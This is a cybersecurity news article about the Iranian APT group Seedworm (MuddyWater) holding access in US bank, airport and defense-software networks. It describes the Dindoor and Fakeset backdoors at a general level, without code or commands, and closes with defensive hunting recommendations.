Iranian state-sponsored hackers have maintained persistent access inside multiple US critical infrastructure networks since early February 2026, establishing footholds that security researchers warn could enable devastating attacks amid escalating geopolitical tensions in the Middle East.
MuddyWater Returns with New Malware Arsenal
Symantec and Carbon Black researchers have attributed the activity to Seedworm (also known as MuddyWater), an Iranian advanced persistent threat (APT) group linked to Iran’s Ministry of Intelligence and Security (MOIS). The group has a long history of espionage campaigns targeting government agencies, telecommunications companies, and critical infrastructure worldwide.
The ongoing campaign has compromised networks belonging to:
- A US bank
- A US airport
- Non-profit organizations
- Israeli operations of a US defense and aerospace software company
The attackers have deployed two previously unknown malware families:
Dindoor Backdoor
Named for its use of Deno, a modern JavaScript and TypeScript runtime environment, Dindoor represents a shift in Seedworm’s tooling toward cross-platform capable frameworks. The backdoor was digitally signed with a certificate issued to an individual named “Amy Cherne.”
Fakeset Python Backdoor
This Python-based backdoor uses certificates attributed to both “Amy Cherne” and “Donald Gay” — the latter having been previously associated with Seedworm’s Stagecomp and Darkcomp malware. This signature overlap provides strong attribution links to the Iranian APT.
Espionage-Focused Operations
The campaign appears focused on intelligence collection rather than disruption. Researchers observed attackers attempting to exfiltrate data from the targeted software company to a Wasabi cloud storage bucket using Rclone, the popular open-source cloud synchronization tool often abused by threat actors for data theft.
“While it’s not known if the operations of Seedworm are disrupted by the current conflict, already having a presence on US and Israeli networks prior to the current hostilities beginning means the threat group is in a potentially dangerous position to launch attacks,” the researchers noted.
Exposed Infrastructure Reveals Broader Campaign
In a related development, independent threat-intel research collective Ctrl-Alt-Intel claimed to have accessed Seedworm’s command-and-control infrastructure hosted in the Netherlands, recovering C2 tooling, scripts, logs, and victim data.
Their analysis revealed additional targets including:
- Israeli healthcare, hosting, immigration, and intelligence organizations
- EgyptAir
- Jordanian government entities
- Various UAE companies
- Additional US entities
- Jewish and Israeli-linked NGOs
The exposed infrastructure demonstrated sophisticated operational tradecraft: “Multiple custom-developed C2 frameworks, exploitation of over a dozen CVEs including novel SQL injection vulnerabilities, password spraying campaigns, Ethereum-based C2 resolution, and multiple exfiltration channels spanning cloud storage & EC2 instances.”
Why This Matters
With the conflict between Israel and Iran intensifying, Seedworm’s pre-positioned access in US critical infrastructure represents a significant national security concern. The group’s presence in banking and aviation networks — both sectors that could cause widespread disruption if attacked — demonstrates Iran’s strategic cyber preparation for potential escalation.
Organizations in critical infrastructure sectors should immediately:
- Hunt for indicators of compromise associated with Dindoor and Fakeset
- Monitor for unauthorized use of Rclone or similar exfiltration tools
- Review certificate trust chains for suspicious signers
- Implement enhanced monitoring for Deno runtime execution
Source: Help Net Security
